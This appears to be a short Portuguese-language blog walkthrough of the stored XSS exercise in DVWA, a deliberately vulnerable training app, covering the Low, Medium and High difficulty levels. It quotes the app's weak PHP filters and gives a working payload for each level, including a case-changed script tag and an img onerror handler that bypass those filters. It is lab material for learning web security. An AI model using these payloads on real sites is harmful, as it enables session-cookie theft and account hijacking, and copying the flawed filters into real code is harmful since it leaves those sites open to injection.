DVWA Solution — Stored Cross Site Scripting (XSS)
1 min readApr 9, 2019
Low
Sem verificação, injeção direta
<script>alert(document.cookie)</script>
Medium
Ao visualizarmos o código-fonte vemos que o mesmo filtrar a tag <script>
$name = str_replace( '<script>', '', $name );
A vulnerabilidade agora esta no campo de “name”, porem não temos espaço suficiente temos que editar o campo e aumentar o tamanha da variável “maxlength” para 100 por exemplo.
Vamos tambem ignorar o filtro alterando o sensitivo das letras da tag. E voce conseguira executar o XSS.
<Script>alert(document.cookie)</script>
High
Neste nível a aplicação faz um filtro em todos os itens enviados da Tag.
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
Podemos então mudar o método de captura do cookie, não podemos esquecer de aumentar o tamanho de caracteres permitidos no campo, conforme o item Medium.
<img src=1 onerror=alert(document.cookie)>